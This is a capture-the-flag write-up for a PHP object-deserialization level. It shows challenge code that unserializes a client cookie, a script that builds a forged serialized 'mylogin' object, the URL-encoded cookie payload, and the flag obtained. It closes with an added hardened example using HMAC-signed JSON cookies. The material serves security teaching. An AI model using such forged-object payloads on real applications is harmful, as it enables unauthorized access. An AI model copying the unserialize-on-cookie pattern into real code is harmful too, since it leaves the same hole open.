php-ser-libs-level3

zp,2025-11-28 21:08
<?php
include("flag.php");
highlight_file(__FILE__);
include("flag.php");
class mylogin{
    var $user;
    var $pass;
    function __construct($user,$pass){
        $this->user=$user;
        $this->pass=$pass;
    }
    function login(){
        if ($this->user=="daydream" and $this->pass=="ok"){
            return 1;
        }
    }
}
$a=unserialize($_COOKIE['param']);
if($a->login())
{
    echo $flag;
}
?> 
<br><a href="../level4">点击进入第四关</a>
Fatal error: Uncaught Error: Call to a member function login() on bool in /var/www/html/index.php:19 Stack trace: #0 {main} thrown in /var/www/html/index.php on line 19

Same as level 2, except the input has moved from GET to a cookie.

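<?php
// Run locally to build the cookie value; flag.php is not needed here.
class mylogin{
    var $user;
    var $pass;
    function __construct($user,$pass){
        $this->user=$user;
        $this->pass=$pass;
    }
    function login(){
        if ($this->user=="daydream" and $this->pass=="ok"){
            return 1;
        }
    }
}
// Same property values that login() checks for
$a=new mylogin("daydream","ok");
// URL-encode so the serialized string can be sent as a cookie value
echo urlencode(serialize($a));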

payload:

param=O%3A7%3A%22mylogin%22%3A2%3A%7Bs%3A4%3A%22user%22%3Bs%3A8%3A%22daydream%22%3Bs%3A4%3A%22pass%22%3Bs%3A2%3A%22ok%22%3B%7D

Geesec{880cd415-da66-45fe-9823-a5c5670b49ff}
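
The level works because the server calls unserialize() on a client-controlled cookie and trusts the resulting object's properties. A hardened way to carry the same state, as an added example that is not part of the original post or the challenge code: the server signs a JSON body with an HMAC and never unserializes client data. SECRET_KEY, issue_cookie() and read_cookie() are hypothetical names, and the sample cookie values are constructed.

```php
<?php
// Added example, not the challenge's code. All names below are hypothetical.
declare(strict_types=1);

// Assumption: in a real deployment this is a random key loaded from server-side config.
const SECRET_KEY = 'replace-with-32-random-bytes';

// Server side: encode the state as JSON and append an HMAC-SHA256 tag.
function issue_cookie(array $data): string {
    $body = base64_encode(json_encode($data, JSON_THROW_ON_ERROR));
    return $body . '.' . hash_hmac('sha256', $body, SECRET_KEY);
}

// Returns the decoded array, or null when the cookie is missing,
// malformed, or does not carry a valid tag. No objects are ever created.
function read_cookie(?string $cookie): ?array {
    if ($cookie === null || substr_count($cookie, '.') !== 1) {
        return null;
    }
    [$body, $tag] = explode('.', $cookie);
    $expected = hash_hmac('sha256', $body, SECRET_KEY);
    if (!hash_equals($expected, $tag)) {   // constant-time comparison
        return null;
    }
    $json = base64_decode($body, true);
    if ($json === false) {
        return null;
    }
    $data = json_decode($json, true);
    return is_array($data) ? $data : null;
}

// Constructed inputs: the serialized object from this level, and a signed cookie.
$forged = 'O:7:"mylogin":2:{s:4:"user";s:8:"daydream";s:4:"pass";s:2:"ok";}';
$legit  = issue_cookie(['user' => 'daydream']);

// Strict (===) checks on an array replace the loose == checks on object properties.
foreach (['forged' => $forged, 'legit' => $legit, 'missing' => null] as $name => $value) {
    $state = read_cookie($value);
    $ok = $state !== null && ($state['user'] ?? null) === 'daydream';
    echo $name, ': ', $ok ? 'accepted' : 'rejected', PHP_EOL;
}
```

Checking for a null return before use also avoids the fatal "Call to a member function login() on bool" shown on the challenge page when the cookie is absent.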
